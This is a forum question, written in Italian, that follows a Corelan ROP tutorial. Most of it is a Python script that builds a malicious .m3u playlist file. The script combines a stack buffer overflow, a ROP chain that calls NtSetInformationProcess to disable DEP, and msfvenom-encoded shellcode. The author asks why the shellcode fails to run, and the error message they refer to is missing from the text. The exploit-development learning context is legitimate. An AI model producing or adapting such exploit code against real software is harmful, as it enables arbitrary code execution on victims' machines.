Seguendo l'esempio di Corelan Team ROP versione 2 (ero in grado di eseguire la versione 1): link
Sono stato in grado di produrre questo exploit:
import struct
f = open("kill.m3u", "w")
buf = ""
# 33764832 [*] Exact match at offset 6098
buf += "A" * (20000 + 6098 - 2 - 4 - 8)
buf += struct.pack("<I", 0x100102DC) # any ret is good
buf += "AAAA"
# --------------START:saving stack pointer and jumping over the parameters -------------------#
# 5AD79277 54 PUSH ESP
# 5AD79278 8BC2 MOV EAX,EDX
# 5AD7927A 5F POP EDI
# 5AD7927B C3 RETN
buf += struct.pack("<I", 0x5AD79277)
# 77C1E842 57 PUSH EDI
# 77C1E843 58 POP EAX
# 77C1E844 5D POP EBP
# 77C1E845 C3 RETN
buf += struct.pack("<I", 0x77C1E842)
buf += "AAAA"
# --------------END:saving stack pointer and jumping over the parameters -------------------#
# 1001653D 83C4 20 ADD ESP,20
# 10016540 C3 RETN
buf += struct.pack("<I", 0x1001653D)
# --------------START: Parameters for NtSetInformationProcess() ---------------------------#
buf += struct.pack("<I", 0x7C90DC9E) # NtSetInformationProcess() cu 5 parametrii
buf += "AAAA" # adresa shellcode EX: 0010F870 => 70 f8 10 00
buf += struct.pack("<I", 0xFFFFFFFF) # 0xFFFFFFFF
buf += "CCCC" # 0x22
buf += "DDDD" # Pointer to 0x00000002, may be a static address hardcoded in your sploit, but must be writeable
buf += "EEEE" # Static value, set to 0x4
buf += "H" * 8
# --------------END: Parameters for NtSetInformationProcess() ---------------------------#
# 0x01937BE5 lands here
# --------------START: crafting the first parameter (return address) -----------------------#
# 763C982F 87FE XCHG ESI,EDI
# 763C9831 FFC9 DEC ECX
# 763C9833 C2 0400 RETN 4
buf += struct.pack("<I", 0x763C982F) # But before we can use this instruction, we have to put the right value into ESI.
# 77504CB3 05 0C020000 ADD EAX,20C = 524
# 77504CB8 C3 RETN
# 775E16DD 05 3C020000 ADD EAX,23C = 572
# 775E16E2 C3 RETN
# 77C1C8F0 83C0 20 ADD EAX,20
# 77C1C8F3 5D POP EBP
# 77C1C8F4 C3 RETN
buf += struct.pack("<I", 0x775E16DD) # increment with 572 bytes (increase EAX)
buf += struct.pack("<I", 0x77C1C8F0) # increment with 572 bytes (increase EAX)
# 77E841DA 8946 10 MOV DWORD PTR DS:[ESI+10],EAX
# 77E841DD 8BC6 MOV EAX,ESI
# 77E841DF 5E POP ESI
# 77E841E0 C3 RETN
buf += struct.pack("<I", 0x77E841DA) # Next, we need to write this value onto the stack, overwriting the placeholder (which currently contains "AAAA")
buf += "AAAA"
# --------------END: crafting the first parameter (return address) -----------------------#
# --------------START: generate the value for the third parameter (0x22) ----------------#
# 775D177F 50 PUSH EAX
# 775D1780 5E POP ESI
# 775D1781 C3 RETN
buf += struct.pack("<I", 0x775D177F) # At the current time, EAX still holds the initial saved stack pointer. We have to put it back in ESI.
#increase ESI with 4 (second parameter)
# 77C12809 46 INC ESI
# 77C1280A C3 RETN
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
#increase ESI with 4 (for third parameter becouse the second is harcoded to simplify things)
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77E841DA) # Next, we need to write this value onto the stack, overwriting the placeholder (which currently contains "CCCC")
buf += "AAAA"
buf += struct.pack("<I", 0x775D177F)
# 100307A9 33C0 XOR EAX,EAX
# 100307AB C3 RETN
buf += struct.pack("<I", 0x100307A9) # zero out eax
# 1002DC41 83C0 40 ADD EAX,40
# 1002DC44 5D POP EBP
# 1002DC45 C3 RETN
buf += struct.pack("<I", 0x1002DC41)
buf += "AAAA"
# 10027D2E 83C0 FE ADD EAX,-2
# 10027D31 5D POP EBP
# 10027D32 C3 RETN
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x77E841DA) # Next, we need to write this value onto the stack, overwriting the placeholder (which currently contains "CCCC")
buf += "AAAA"
# --------------END: generate the value for the third parameter (0x22) ----------------#
# --------------START: generate the value for the 4th parameter (0x00000002) ----------------#
# 775D177F 50 PUSH EAX
# 775D1780 5E POP ESI
# 775D1781 C3 RETN
buf += struct.pack("<I", 0x775D177F) # At the current time, EAX still holds the initial saved stack pointer. We have to put it back in ESI.
#increase ESI with 4 (second parameter)
# 77C12809 46 INC ESI
# 77C1280A C3 RETN
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77E841DA) # Next, we need to write this value onto the stack, overwriting the placeholder (which currently contains "DDDD")
buf += "AAAA"
buf += struct.pack("<I", 0x775D177F)
# 100307A9 33C0 XOR EAX,EAX
# 100307AB C3 RETN
buf += struct.pack("<I", 0x100307A9)
# 77EA1767 83C0 02 ADD EAX,2
# 77EA176A C3 RETN
buf += struct.pack("<I", 0x77EA1767)
buf += struct.pack("<I", 0x77E841DA) # Next, we need to write this value onto the stack, overwriting the placeholder (which currently contains "DDDD")
buf += "AAAA"
# --------------END: generate the value for the 4th parameter (0x00000002) ----------------#
# --------------START: generate the value for the 5th parameter (0x4) ----------------#
# 775D177F 50 PUSH EAX
# 775D1780 5E POP ESI
# 775D1781 C3 RETN
buf += struct.pack("<I", 0x775D177F) # At the current time, EAX still holds the initial saved stack pointer. We have to put it back in ESI.
#increase ESI with 4 (second parameter)
# 77C12809 46 INC ESI
# 77C1280A C3 RETN
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77E841DA) # Next, we need to write this value onto the stack, overwriting the placeholder (which currently contains "EEEE")
buf += "AAAA"
buf += struct.pack("<I", 0x775D177F)
# 100307A9 33C0 XOR EAX,EAX
# 100307AB C3 RETN
buf += struct.pack("<I", 0x100307A9)
# 77EA1767 83C0 02 ADD EAX,2
# 77EA176A C3 RETN
buf += struct.pack("<I", 0x77EA1767)
# 77EA1767 83C0 02 ADD EAX,2
# 77EA176A C3 RETN
buf += struct.pack("<I", 0x77EA1767)
buf += struct.pack("<I", 0x77E841DA) # Next, we need to write this value onto the stack, overwriting the placeholder (which currently contains "EEEE")
buf += "AAAA"
# --------------END: generate the value for the 5th parameter (0x4) ----------------#
# --------------START: Last step of ROP = jump to NtSetInformationProcess ----------------#
# 775D1752 83E8 04 SUB EAX,4
# 775D1755 C3 RETN
buf += struct.pack("<I", 0x775D1752)
buf += struct.pack("<I", 0x775D1752)
buf += struct.pack("<I", 0x775D1752)
# 73DF37E4 50 PUSH EAX
# 73DF37E5 5C POP ESP
# 73DF37E6 8BC7 MOV EAX,EDI
# 73DF37E8 5F POP EDI
# 73DF37E9 5E POP ESI
# 73DF37EA C3 RETN
buf += struct.pack("<I", 0x73DF37E4)
# --------------END: Last step of ROP = jump to NtSetInformationProcess ----------------#
# total kill of DEP
buf += "\x90" * (199 + 5)
#76E82313 FFE4 JMP ESP
# msfvenom -a x86 --platform windows -p windows/exec CMD='calc' --encoder x86/alpha_mixed -f py
buf += "\x89\xe6\xdb\xcb\xd9\x76\xf4\x5b\x53\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x39\x78\x4c"
buf += "\x42\x73\x30\x33\x30\x45\x50\x45\x30\x4e\x69\x38\x65"
buf += "\x36\x51\x6f\x30\x62\x44\x4c\x4b\x70\x50\x66\x50\x4c"
buf += "\x4b\x36\x32\x74\x4c\x6e\x6b\x32\x72\x42\x34\x4c\x4b"
buf += "\x63\x42\x35\x78\x66\x6f\x48\x37\x31\x5a\x65\x76\x30"
buf += "\x31\x39\x6f\x6c\x6c\x45\x6c\x70\x61\x33\x4c\x64\x42"
buf += "\x64\x6c\x67\x50\x59\x51\x5a\x6f\x66\x6d\x45\x51\x58"
buf += "\x47\x59\x72\x59\x62\x70\x52\x61\x47\x4e\x6b\x76\x32"
buf += "\x76\x70\x6c\x4b\x63\x7a\x37\x4c\x6c\x4b\x52\x6c\x72"
buf += "\x31\x54\x38\x38\x63\x70\x48\x53\x31\x48\x51\x36\x31"
buf += "\x6c\x4b\x71\x49\x55\x70\x63\x31\x38\x53\x6c\x4b\x51"
buf += "\x59\x74\x58\x68\x63\x45\x6a\x71\x59\x6c\x4b\x35\x64"
buf += "\x4e\x6b\x47\x71\x7a\x76\x34\x71\x69\x6f\x4e\x4c\x4f"
buf += "\x31\x38\x4f\x56\x6d\x73\x31\x4a\x67\x55\x68\x4d\x30"
buf += "\x51\x65\x78\x76\x56\x63\x43\x4d\x39\x68\x65\x6b\x71"
buf += "\x6d\x57\x54\x44\x35\x38\x64\x30\x58\x6e\x6b\x53\x68"
buf += "\x31\x34\x76\x61\x78\x53\x43\x56\x6c\x4b\x66\x6c\x52"
buf += "\x6b\x4e\x6b\x66\x38\x45\x4c\x57\x71\x69\x43\x4c\x4b"
buf += "\x37\x74\x6e\x6b\x46\x61\x4e\x30\x6e\x69\x33\x74\x46"
buf += "\x44\x47\x54\x43\x6b\x51\x4b\x43\x51\x30\x59\x52\x7a"
buf += "\x43\x61\x79\x6f\x6d\x30\x63\x6f\x73\x6f\x62\x7a\x6c"
buf += "\x4b\x65\x42\x78\x6b\x6c\x4d\x51\x4d\x72\x4a\x56\x61"
buf += "\x6e\x6d\x4f\x75\x6d\x62\x67\x70\x67\x70\x67\x70\x76"
buf += "\x30\x32\x48\x64\x71\x4e\x6b\x72\x4f\x6c\x47\x4b\x4f"
buf += "\x38\x55\x6d\x6b\x4c\x30\x4c\x75\x4f\x52\x53\x66\x50"
buf += "\x68\x6f\x56\x6a\x35\x4d\x6d\x6f\x6d\x79\x6f\x6b\x65"
buf += "\x57\x4c\x45\x56\x63\x4c\x56\x6a\x4b\x30\x4b\x4b\x49"
buf += "\x70\x52\x55\x63\x35\x6f\x4b\x72\x67\x44\x53\x52\x52"
buf += "\x30\x6f\x51\x7a\x67\x70\x66\x33\x69\x6f\x7a\x75\x71"
buf += "\x73\x75\x31\x62\x4c\x45\x33\x43\x30\x41\x41"
buf += "\x90" * (27000 - len(buf))
print len(buf)
f.write(buf)
f.close()
Dopo questo lungo ROP ho ottenuto un salto ma non un'esecuzione dello shellcode mentre sto ricevendo questo messaggio:
Suquesto:
Ho fatto qualcosa di sbagliato o qualcosa di nuovo?